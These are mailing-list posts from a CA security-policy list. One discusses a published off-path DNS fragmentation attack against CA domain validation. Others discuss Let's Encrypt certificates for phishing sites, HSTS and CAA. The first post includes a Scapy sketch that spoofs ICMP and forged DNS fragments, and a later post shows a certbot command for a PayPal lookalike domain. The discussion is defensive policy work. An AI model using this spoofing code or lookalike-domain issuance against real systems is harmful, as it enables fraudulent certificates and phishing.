DNS fragmentation attack subverts DV, 5 public CAs vulnerable

2018-12-11 Thread Hector Martin via dev-security-policy
I figured this presentation might be of interest to this list:

https://i.blackhat.com/eu-18/Thu-Dec-6/eu-18-Heftrig-Off-Path-Attacks-Against-PKI.pdf

It seems they found that 5 (unspecified) of the 17 public CAs they tested
were vulnerable to this attack, which can be mounted by an off-path attacker.

The TL;DR: you can force fragmentation by spoofing ICMP "fragmentation
needed" packets at the nameserver, causing the DNS answer to be split into
two fragments: one carrying all of the anti-spoofing material (TXID, UDP
source port, etc.), and one carrying the answer data of interest. All you
then have to do is guess the IPID and keep the UDP checksum valid, both of
which are practical, and you can spoof that second fragment with whatever
you want.
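
To make the mechanics concrete, here is a rough sketch (Python/Scapy) of the
two spoofed packets involved. All addresses, ports, offsets and record
contents below are hypothetical placeholders of my own, not values from the
paper, and a real attack additionally has to predict the nameserver's IPID
sequence and balance the UDP checksum, which this only gestures at:

    # Illustrative sketch only; hypothetical addresses, not a working exploit.
    from scapy.all import IP, ICMP, UDP, Raw, DNSRR, send

    NS_IP = "192.0.2.53"          # authoritative nameserver (spoofed sender)
    RESOLVER_IP = "198.51.100.7"  # the CA's validating resolver

    # Step 1: spoof an ICMP "fragmentation needed" (type 3, code 4) message at
    # the nameserver, advertising a tiny path MTU so it starts fragmenting its
    # responses to the resolver. The embedded header imitates a datagram the
    # nameserver supposedly sent.
    quoted = IP(src=NS_IP, dst=RESOLVER_IP) / UDP(sport=53, dport=33333)
    frag_needed = (IP(src=RESOLVER_IP, dst=NS_IP)
                   / ICMP(type=3, code=4, nexthopmtu=296)
                   / quoted)
    send(frag_needed)

    # Step 2: pre-plant a forged *second* fragment of the DNS response. The
    # real first fragment carries the TXID and UDP header, so this one only
    # has to match (src, dst, protocol, IPID) plus the fragment offset. Its
    # payload replaces the tail of the answer section, e.g. with an
    # attacker-controlled A record, padded so the UDP checksum still adds up.
    guessed_ipid = 4321   # predicted / brute-forced in practice
    frag_offset = 34      # in 8-byte units; 272 payload bytes precede it at MTU 296
    forged_tail = bytes(DNSRR(rrname="victim.example.", type="A",
                              ttl=300, rdata="203.0.113.66"))
    spoofed_frag = IP(src=NS_IP, dst=RESOLVER_IP, id=guessed_ipid, proto=17,
                      flags=0, frag=frag_offset) / Raw(forged_tail)
    send(spoofed_frag)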

Yet another reason to push for DNSSEC everywhere (and pervasive use of
CAA records to reduce attack surface). This is scary enough I think CAs
should be required to implement practical mitigations.
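
For reference, CAA is just a couple of DNS records. A hypothetical zone that
restricts issuance to a single CA and asks for violation reports would look
something like this (the domain and contact address are placeholders):

    example.com.  IN CAA 0 issue "letsencrypt.org"
    example.com.  IN CAA 0 issuewild ";"
    example.com.  IN CAA 0 iodef "mailto:security@example.com"

Of course, CAA answers are themselves fetched over DNS, which is why, without
DNSSEC, this reduces the attack surface rather than eliminating it.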

Thoughts?
-- 
Hector Martin (mar...@marcan.st)
Public Key: https://mrcn.st/pub


Re: Over 14K 'Let's Encrypt' SSL Certificates Issued To PayPal Phishing Sites

2017-03-30 Thread Hector Martin via dev-security-policy
On 2017-03-30 23:30, Alex Gaynor via dev-security-policy wrote:
>>> 1. HTTP
>>> 2. "I explicitly asked for security and didn't get it" (HTTPS with no
>>> validation)
>>> 3. HTTPS
> 
> You're not wrong that (2) is better than (1). It's also indistinguishable
> from a downgrade attack from (3).

But so is (1) if the URI didn't come from somewhere that already
requested HTTPS. Enter HSTS, etc. Ultimately, yes, ideally we'd have had
something like HSTS levels for each trust level, plus matching URI
schemes or some other way of requesting a minimum trust level in the URI.
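
For completeness, the HSTS piece of that is a single response header; a
typical policy covering a site and its subdomains would be something like:

    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload

The "preload" token only has an effect once the domain is actually submitted
to the browsers' preload list, which is what closes the first-visit gap HSTS
alone leaves open.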

> If we got to do the web all over again, I think we'd make the UX for (1)
> have an interstitial, or just not exist. Unfortunately, we're paying down
> two decades of technical debt :-)

Indeed. This is something that was a day 1 design flaw in HTTPS (with
the UX as implemented). The moment you start throwing up big scary
warnings for self-signed certs and not for HTTP, you've lost, because
the people with certs aren't going to want to become susceptible to
downgrade attacks. Though browser makers have progressively made this
worse by making the warning scarier and scarier.

Ah well, we are where we are. I'm grateful I can finally nuke a couple
random personal CAs and just Let's Encrypt everything, with HSTS. With
any luck browsers will start significantly penalizing the HTTP UX and
we'll finally get on the path to ubiquitous encryption.

-- 
Hector Martin (mar...@marcan.st)
Public Key: https://mrcn.st/pub


Re: Over 14K 'Let's Encrypt' SSL Certificates Issued To PayPal Phishing Sites

2017-03-29 Thread Hector Martin via dev-security-policy

On 28/03/17 08:23, Peter Gutmann via dev-security-policy wrote:
> Martin Heaps via dev-security-policy writes:
> 
>> This topic is frustrating in that there seems to be a wide attempt by people
>> to use one form of authentication (DV TLS) to verify another form of
>> authentication (EV TLS).
> 
> The overall problem is that browser vendors have decreed that you can't have
> encryption unless you have a certificate, i.e. a CA-supplied magic token to
> turn the crypto on.  Let's Encrypt was an attempt to kludge around this by
> giving everyone one of these magic tokens.  Like a lot of other kludges, it
> had negative consequences...

It's not a kludge, though. Let's Encrypt is not (merely) a workaround 
for the fact that self-signed certificates are basically considered 
worthless. If it were, it wouldn't meet BR rules. Let's Encrypt actively 
performs validation of domains, and in that respect is as legitimate as 
any other DV CA.


We actually have *five* levels of trust here:

1. HTTP
2. HTTPS with no validation (self-signed or anonymous ciphersuite)
3. HTTPS with DV
4. HTTPS with OV
5. HTTPS with EV

These are (mostly) technically objective levels of trust. There is also a
tangential attribute, which is subjective:

a. Is not a phishing or malicious site.

Let's Encrypt aims to obsolete levels 1 and 2 by making 3 ubiquitously 
accessible.


The problem is that browser vendors have historically treated trust as 
binary, confounding (3), (4), and (a), mostly because the ecosystem at 
the time made it hard to get (3) without meeting (a). They also 
inexplicably treated (2) as worse than (1), which is of course nonsense, 
but I guess was driven by some sort of backwards thinking that "if you 
have security at all, you'd better have good security" (or, 
equivalently: "normal people don't need security, and a mediocre attempt 
at security implies Bad Evil Things Are Happening").


With time, certificates have become more accessible, everyone has come 
to agree that we all need security, and with that, that thinking has 
become obsolete. Getting a DV cert for a phishing site was by no means 
hard before Let's Encrypt. Now that Let's Encrypt is here, it's trivial.
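
To illustrate "trivial": assuming the stock certbot client and the HTTP-01
webroot flow, one invocation against a (hypothetical) lookalike domain is
all it takes:

    certbot certonly --webroot -w /var/www/html -d paypal-secure-login.example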



> So it's now being actively exploited... how could anyone *not* see this
> coming?  How can anyone actually be surprised that this is now happening?  As
> the late Bob Jueneman once said on the PKIX list (over a different PKI-related
> topic), "it's like watching a train wreck in slow motion, one freeze-frame at
> a time".  It's pre-ordained what's going to happen, the most you can do is
> artificially delay its arrival.


And this question should be directed at browser vendors. After years of 
mistakenly educating users that "green lock = good, safe, secure, 
awesome, please type in all your passwords", how could they *not* see 
this coming?



>> The end nessecity is that the general public need to be educated [...]
> 
> Quoting Vesselin Bontchev, "if user education was going to work, it would have
> worked by now".  And that was a decade ago.


This is strictly a presentation layer problem. We *know* what the 
various trust levels mean. We need to present them in a way that is 
*useful* to users.


Obvious answer? Make (1)-(2) big scary red, (3) neutral, (4) green, (5) the
full EV banner. (a) still correlates reasonably well with (4) and (5). HTTPS
is no longer optional. All those phishing sites get a neutral URL bar. We've
already educated users that their bank needs a green lock in the URL bar.

